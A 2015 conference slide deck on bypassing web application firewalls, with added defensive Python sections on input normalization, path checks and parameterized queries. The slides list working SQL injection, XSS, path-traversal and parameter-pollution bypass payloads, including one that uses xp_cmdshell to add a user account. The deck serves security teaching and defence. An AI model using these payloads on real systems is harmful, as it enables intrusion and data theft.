Web Application Firewall: Suckseed or Succeed

Posted on 06-May-2015

Breach WAF with advanced techniques

Web Application Firewall (WAF): Suckseed or Succeed!?

Mr. Prathan Phongthiproek, Consulting Manager, Red Team, ACIS Professional Center

Who am I?

ACIS Professional Center

Manager of the Red Team

Specializing in Attack & Penetration

Information Security Consulting Manager

Instructor and Speaker

Founder of CWH Underground Hacker

Aka 0x7a657133756c

Let's Reveal

Introduction to Web Application Firewall (WAF)

Breach it!! Filter Evasion

HTTP Parameter Contamination

HTTP Pollution: Split and Join

Conclusion

Introduction to Web Application Firewall (WAF)

Web Application Hacking

7 of 10 sites are vulnerable

70% of Cyber attacks are on web ports

95% of companies are hacked through web ports

Anonymous and LulzSec

Hacker groups running an operation: #AntiSec

Web Application Hacking

Top 3 Web App Attacks

Cross Site Scripting

File Inclusion (Remote/Local)

SQL Injection (Normal/Blind/Time based/Regex...)

Misunderstanding of how to harden a web application

What's a WAF?

Emerged from IDS/IPS, focused on the HTTP protocol and HTTP-related attacks

Usually contains a lot of complex regular-expression rules to match against (a blacklist)

For most WAF vendors the rules are “closely guarded secrets”

Open-source WAFs (ModSecurity and PHPIDS) have open-source rules

Understand the blacklist

Detection and Protection

SQL Injection

Cross Site Scripting

Local and Remote File Inclusion

Code/Command Injection

Directory Traversal

Buffer Overflow

Cookie Poisoning

Parameter Tampering

Upload File Mis-Handling

Information Disclosure

Etc...

WAF Vendors

Armorize

Barracuda

Cisco ACE

Citrix Netscaler

F5

Imperva SecureSphere

Radware Appwall

Profense

Bee-ware

BinarySec

Mod Security

WebKnight

DenyAll

Fortify

Visonys

Pentasecurity

Others...

WAF implementation

Breach it!! (CMS and WAFs)

“Under control, under control... and then it burst”

Filter Evasion (SQLi)

PHP: magic_quotes on, mysql_real_escape_string(), addslashes()

' " -> \' \"

id=1 and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name='users'

Filter Evasion (SQLi)

PHP: magic_quotes on, mysql_real_escape_string(), addslashes()

' " -> \' \"

The quoted string is replaced by a hex literal, so there is nothing left for the escaping to act on:

id=1 and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273

Filter Evasion (SQLi)

PHP: magic_quotes on, mysql_real_escape_string(), addslashes()

String written as ASCII codes with CHAR(), again without any quote characters:

id=1 and 1=2 union select 1,load_file(CHAR(47,118,97,114,47,119,119,119,47,104,116,109,108,47,99,111,110,102,105,103,47,99,111,110,102,105,103,46,105,110,99,46,112,104,112))

Filter Evasion (SQLi)

Comments: //, --, /**/, /*, #, %00

id=1+un/**/ion+se/**/lect+1,2,3--

Case changing (the filter only matches lower case): /union\sselect/g

id=1+UnIoN/**/SeLecT/**/1,2,3--

Replaced keywords (the filter deletes the keyword in a single pass):

id=1+UnunionIoN+SeselectLecT+1,2,3--

Filter Evasion (SQLi)

Case Study: NukeSentinel (PHP Nuke)

Encode to Hex

Forbidden: http://victim.com/php-nuke/?/**/union/**/select.......

Bypass: http://victim.com/php-nuke/?/%2A%2A/union/%2A%2A/select.......

Bypass: http://victim.com/php-nuke/?%2F**%2Funion%2F**%2Fselect.......

Filter Evasion (SQLi)

Buffer Overflow (for filters written in C)

id=1+and+(select 1)=(Select 0x41414141414141414141414141414141.....)+UnIoN+SeLecT+1,version(),3,database(),user(),6,7,8,9,10--

Filter Evasion (SQLi)

Inline Comments (/*!......*/)

A lot of WAFs were bypassed

Bypasses IPS and regex timeouts

MySQL Only (http://dev.mysql.com/doc/refman/5.0/en/comments.html)

/union\sselect/ig

id=1/*!UnIoN*/+/*!SeLecT*/+1,2,concat(/*!table_name*/)+FrOm/*!information_schema*/.tables/*!WhErE*/+/*!TaBlE_sChEMa*/+like+database()--

Filter Evasion (SQLi)

Other bypasses (equivalent operators and functions):

and -> &&

or -> ||

= -> like

substring() -> substr(), mid(), strcmp()

ascii() -> hex(), bin(), char(), ord()

benchmark() -> sleep()

Whitespace -> (),/**/,%0b

isnull, between

Filter Evasion (SQLi)

Case Study: PHPIDS

Filter Evasion (SQLi)

Case Study: Mod Security CRS

SecRule REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/* "\bunion\b.{1,100}?\bselect\b" \

"phase:2,rev:'2.2.1',capture,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:replaceComments,t:compressWhiteSpace,ctl:auditLogParts=+E,block,msg:'SQL Injection Attack',id:'959047',tag:'WEB_ATTACK/SQL_INJECTION',tag:'WASCTC/WASC-19',tag:'OWASP_TOP_10/A1',tag:'OWASP_AppSensor/CIE1',tag:'PCI/6.5.2',logdata:'%{TX.0}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.sql_injection_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{tx.0}"
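The CRS rule above only fires after its transformation chain (urlDecodeUni, lowercase, replaceComments, compressWhiteSpace) has run, and the slides show two ways that chain falls short: replaceComments, as documented, replaces the whole /* ... */ including its body with a space, so the keywords inside a MySQL /*!UnIoN*/ conditional comment vanish before the regex sees them, and a "replaced keywords" sanitizer that deletes a keyword once simply reassembles it. The following added example, written for this page and not taken from ModSecurity or the talk, shows a normalizer that keeps the body of conditional comments, checks both plausible readings of an ordinary comment (as whitespace or as nothing), and repeats URL decoding until the value stops changing. The rule regex is the one on the slide; the function and variable names are mine.

```python
import re
from urllib.parse import unquote_plus

# Signature from the CRS rule on the slide (id 959047): 'union' followed by 'select' within 100 chars.
UNION_SELECT = re.compile(r"\bunion\b.{1,100}?\bselect\b", re.DOTALL)

COND_COMMENT = re.compile(r"/\*!\d*(.*?)\*/", re.DOTALL)   # MySQL /*! ... */ or /*!50000 ... */
PLAIN_COMMENT = re.compile(r"/\*.*?\*/", re.DOTALL)         # ordinary C-style comment


def url_decode_fully(value, max_rounds=3):
    """URL-decode until the value stops changing, so %2F**%2F and double-encoded forms collapse."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def crs_replace_comments(value):
    """Model of t:replaceComments: the whole comment, body included, becomes one space."""
    return PLAIN_COMMENT.sub(" ", value)


def canonical_forms(value):
    """Return the set of strings a backend might actually execute for this input."""
    s = url_decode_fully(value).lower()
    # MySQL executes the body of a conditional comment, so the inspector must keep it.
    s = COND_COMMENT.sub(r" \1 ", s)
    forms = set()
    for replacement in (" ", ""):          # comment as whitespace, or comment as nothing
        t = PLAIN_COMMENT.sub(replacement, s)
        t = re.sub(r"[\s\x00]+", " ", t).strip()   # compress whitespace, %0b and %00 included
        forms.add(t)
    return forms


def is_union_select(value):
    """True if any canonical reading of the input matches the union/select signature."""
    return any(UNION_SELECT.search(form) for form in canonical_forms(value))


def delete_keywords_once(value):
    """Model of the 'replaced keywords' sanitizer on the slide: one pass of keyword deletion."""
    return re.sub(r"union|select", "", value, flags=re.IGNORECASE)


if __name__ == "__main__":
    for payload in ("id=1+UnIoN/**/SeLecT/**/1,2,3--",
                    "id=1/*!UnIoN*/+/*!SeLecT*/+1,2,3--",
                    "?%2F**%2Funion%2F**%2Fselect"):
        print(is_union_select(payload), sorted(canonical_forms(payload)))
    # The single-pass deletion turns 'UnunionIoN' into 'UnIoN' and hands the keyword back.
    print(delete_keywords_once("id=1+UnunionIoN+SeselectLecT+1,2,3--"))
```

The design point is that detection must run on what the backend will execute, not on what the WAF finds convenient to strip: stripping is itself a transformation the attacker can target. Where the backend's parsing is ambiguous, inspecting every plausible reading costs a few regex calls and removes the ambiguity as an evasion channel.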

Filter Evasion

Cross Site Scripting (XSS)

Forbidden: http://victim.com/search.php?q=javascript:alert('XSS')

Bypass: http://victim.com/search.php?q=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=

File Inclusion

Forbidden: http://victim.com/download.php?file=../../../etc/passwd

Bypass: http://victim.com/download.php?file=../../../etc/passwd..........

Bypass: http://victim.com/download.php?file=../../../foo/../etc/bar/../passwd
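Both file-inclusion bypasses on the slide are lexically different from the forbidden string but resolve to the same file: the extra foo/.. and bar/.. segments collapse during path resolution, and Windows file APIs drop trailing dots and spaces, so passwd.......... opens passwd. The defence is therefore to canonicalize first and check containment second, rather than to blacklist the literal ../../../etc/passwd. The added example below is mine, not from the talk; BASE_DIR is an assumed directory that download.php is meant to serve from, and the function names are mine.

```python
import posixpath

# Assumption (not from the slides): the only directory download.php may serve files from.
BASE_DIR = "/var/www/files"


def canonical_target(user_path):
    """Resolve the user-supplied path the way the file system will, before any policy check."""
    # Windows file APIs discard trailing dots and spaces, so 'passwd....' still opens 'passwd';
    # strip them here so the check sees the name the OS will use.
    cleaned = user_path.rstrip(". ")
    # posixpath.join discards BASE_DIR when user_path is absolute; the containment check
    # in is_allowed() catches that case. normpath collapses '.' and '..' segments lexically.
    return posixpath.normpath(posixpath.join(BASE_DIR, cleaned))


def is_allowed(user_path):
    """Allow only paths that still sit inside BASE_DIR after canonicalization."""
    if "\x00" in user_path:      # NUL-byte truncation trick: never let it reach the file API
        return False
    target = canonical_target(user_path)
    return target == BASE_DIR or target.startswith(BASE_DIR + "/")


if __name__ == "__main__":
    for p in ("../../../etc/passwd",
              "../../../etc/passwd..........",
              "../../../foo/../etc/bar/../passwd",
              "/etc/passwd",
              "reports/2015.pdf"):
        print(f"{p!r:45} -> {canonical_target(p)!r:35} allowed={is_allowed(p)}")
```

Because every variant on the slide canonicalizes to /etc/passwd, one containment check covers all of them, and any new spelling of the same path an attacker invents later. On a real deployment the same check should be repeated on the realpath after symlink resolution, since a symlink inside BASE_DIR can point outside it.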

HTTP Parameter Contamination

Bypasses the ModSecurity CRS SQLi rules (modsecurity_crs_41)

Bypasses the URLScan 3.1 DenyQueryStringSequences rules

Bypasses the AQTRONIX WebKnight WAF with a stray “%”

HTTP Parameter Contamination

Case Study: AQTRONIX WebKnight

http://victim.com/news.asp?id=10 an%d 1=0/(sel%ect top 1 tab%le_name fr%om inform%ation_schema.tables)

What the WAF inspects: 10 an%d 1=0/(sel%ect top 1 tab%le_name fr%om inform%ation_schema.tables)

What the application receives after ASP drops the stray “%” characters: 10 and 1=0/(select top 1 table_name from information_schema.tables)

HTTP Pollution: Split and Join

HPP is a simple but effective hacking technique

HPP attacks can be defined as the ability to override or add HTTP GET/POST parameters by injecting additional query-string parameters

The focus here is on ASP/ASP.NET, which join repeated parameters with a comma

A lot of WAFs were bypassed

Basic Attack

Forbidden: http://victim.com/search.aspx?q=select name,password from user

Bypass: http://victim.com/search.aspx?q=select name&q=password from user

Parameters as received: q=select name and q=password from user

Joined by ASP.NET: q=select name,password from user

HTTP Pollution: Split and Join

HPP+Inline Comment (Bypass Commercial WAF)

Forbidden: http://victim.com/search.aspx?q=select name,password from user

Bypass: http://victim.com/search.aspx?q=select/*&q=*/name&q=password/*&q=*/from/*&q=*/user

Parameters as received: q=select/* , q=*/name , q=password/* , q=*/from/* , q=*/user

Joined by ASP.NET: q=select/*,*/name,password/*,*/from/*,*/user

After the database strips the comments: q=select name,password from user

HTTP Pollution: Split and Join

HTTP Pollution: Split and Join

Case study: IBM Web Application Firewall (2011-6-21)

Forbidden: http://victim.com/news.aspx?id=1'; EXEC master..xp_cmdshell "net user lucifer UrWaFisShiT /add" --

Bypass: http://victim.com/news.aspx?id=1'; /*&id=1*/ EXEC /*&id=1*/ master..xp_cmdshell /*&id=1*/ "net user lucifer UrWaFisShiT" /*&id=1*/ --

Parameters as received: id=1'; /* , id=1*/ EXEC /* , id=1*/ master..xp_cmdshell /* , id=1*/ "net user lucifer UrWaFisShiT" /* , id=1*/ --

Joined by ASP.NET: id=1'; /*,1*/ EXEC /*,1*/ master..xp_cmdshell /*,1*/ "net user lucifer UrWaFisShiT" /*,1*/ --

After the database strips the comments: id=1'; EXEC master..xp_cmdshell "net user lucifer UrWaFisShiT" --
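The split-and-join slides, together with the HTTP Parameter Contamination case study before them, make one point: the WAF inspected each parameter value in isolation while the backend (ASP.NET) joined the repeated values with a comma and the database then discarded the comments, so the string that ran was never the string that was inspected. The added example below is mine, not from the talk or from any WAF product; it models the ASP.NET comma-join (the behaviour the slides rely on), rebuilds the value the backend will see, flags the duplicate parameter names themselves as a signal, and only then applies signatures. The parse_query, aspnet_view and inspect_query names are mine, and the "%"-dropping behaviour of classic ASP from the WebKnight slide is not modelled here.

```python
import re
from urllib.parse import unquote_plus

PLAIN_COMMENT = re.compile(r"/\*.*?\*/", re.DOTALL)
SELECT_FROM = re.compile(r"\bselect\b.{1,100}?\bfrom\b", re.DOTALL)
EXEC_XP = re.compile(r"\bexec\b.{1,100}?\bxp_cmdshell\b", re.DOTALL)


def parse_query(query):
    """Split a raw query string into name -> [values], keeping every repeated value."""
    params = {}
    for pair in query.split("&"):
        name, _, value = pair.partition("=")
        params.setdefault(unquote_plus(name), []).append(unquote_plus(value))
    return params


def aspnet_view(query):
    """Model of Request.QueryString in ASP.NET: repeated names are joined with ','."""
    return {name: ",".join(values) for name, values in parse_query(query).items()}


def duplicated_names(query):
    """Parameter names that occur more than once; rare in legitimate traffic, so worth logging."""
    return sorted(name for name, values in parse_query(query).items() if len(values) > 1)


def inspect_query(query):
    """Inspect the backend's view of each parameter, after comments are stripped as SQL would."""
    findings = []
    dups = duplicated_names(query)
    if dups:
        findings.append("duplicate parameters: " + ", ".join(dups))
    for name, value in aspnet_view(query).items():
        normalized = re.sub(r"\s+", " ", PLAIN_COMMENT.sub(" ", value.lower())).strip()
        if SELECT_FROM.search(normalized):
            findings.append(f"select...from in {name}")
        if EXEC_XP.search(normalized):
            findings.append(f"exec xp_cmdshell in {name}")
    return findings


if __name__ == "__main__":
    # Query strings from the slides, without the host part.
    for q in ("q=select name&q=password from user",
              "q=select/*&q=*/name&q=password/*&q=*/from/*&q=*/user",
              "q=printer&page=2"):
        print(aspnet_view(q), inspect_query(q))
```

A WAF that cannot be told how the backend joins duplicates should at least refuse or alert on repeated names for parameters the application declares as single-valued; that rule alone defeats every split-and-join payload on these slides, because the split is what makes the technique work.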

“Thailand needs change. It is time for everyone in the country to wake up. Ignorance must come to an end.”

How to protect your website?

Implement Secure Software Development Life Cycle (SSDLC)

Secure Coding: Validate all inputs and outputs

Pentest before going online

Harden it!!

Re-visit again

Deploy WAF (Optional)
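The "validate all inputs" step above is what makes the quote-escaping discussion earlier on this page (magic_quotes, mysql_real_escape_string, addslashes, and the hex-literal payloads that walk past them) irrelevant: escaping quotes cannot help when the injection point is numeric and the payload contains no quotes, whereas type validation plus a bound parameter leaves the value no way to become SQL. The added example below is mine, not from the talk; it uses an in-memory SQLite database with constructed rows, and sqlite_master stands in for MySQL's information_schema in the payload. The function names and the PAYLOAD constant are mine.

```python
import sqlite3

# Constructed demo database, not from the slides.
def make_demo_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", [(1, "alice"), (2, "bob")])
    return conn


# Same shape as the slide's 'id=1 and 1=2 union select ...' payload; no quote characters anywhere.
PAYLOAD = "1 and 1=2 union select group_concat(name) from sqlite_master"


def addslashes(value):
    """Model of PHP addslashes()/magic_quotes: escapes quotes and backslashes, nothing else."""
    return value.replace("\\", "\\\\").replace("'", "\\'").replace('"', '\\"')


def escaped_lookup(conn, user_id):
    """The escaping approach from the slides: quotes are escaped, then the value is concatenated."""
    # A numeric context needs no quotes, so addslashes() has nothing to act on and the
    # payload is spliced into the statement unchanged.
    return conn.execute("SELECT name FROM users WHERE id = " + addslashes(user_id)).fetchall()


def safe_lookup(conn, user_id):
    """Validate the type, then bind the value: it is data to the driver, never SQL syntax."""
    return conn.execute("SELECT name FROM users WHERE id = ?", (int(user_id),)).fetchall()


def run_demo():
    """Returns (escaped result for PAYLOAD, safe result for '1', whether safe_lookup rejected PAYLOAD)."""
    conn = make_demo_db()
    try:
        safe_lookup(conn, PAYLOAD)
        rejected = False
    except ValueError:
        rejected = True
    return escaped_lookup(conn, PAYLOAD), safe_lookup(conn, "1"), rejected


if __name__ == "__main__":
    print(run_demo())   # escaped lookup leaks the schema; safe lookup rejects the payload
```

With the escaped version the payload returns the table list from sqlite_master, exactly the information_schema disclosure the slides demonstrate; with the validated and bound version the same input never reaches the database. A WAF in front of this code is then the optional layer the slide calls it, not the control the application depends on.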

Conclusion

WAF is not the long-expected

Because of its functional limitations, a WAF is not able to protect a web app from all possible vulnerabilities

It is necessary to adapt the WAF filter to the particular web app being protected

A WAF doesn't eliminate a vulnerability; it just partly screens the attack vector

Suckseed or succeed!?

“Security products are not able to 100% protect from the damn config/coding of an admin. It just needs time and imagination to breach it!!”

Greetz To..

ACIS-Red Team

Kyle

Johannes Dahse

Ahmad Maulana

Luca Carettoni

Stefano di Paola

Ivan Markovic

All WAF products that I breached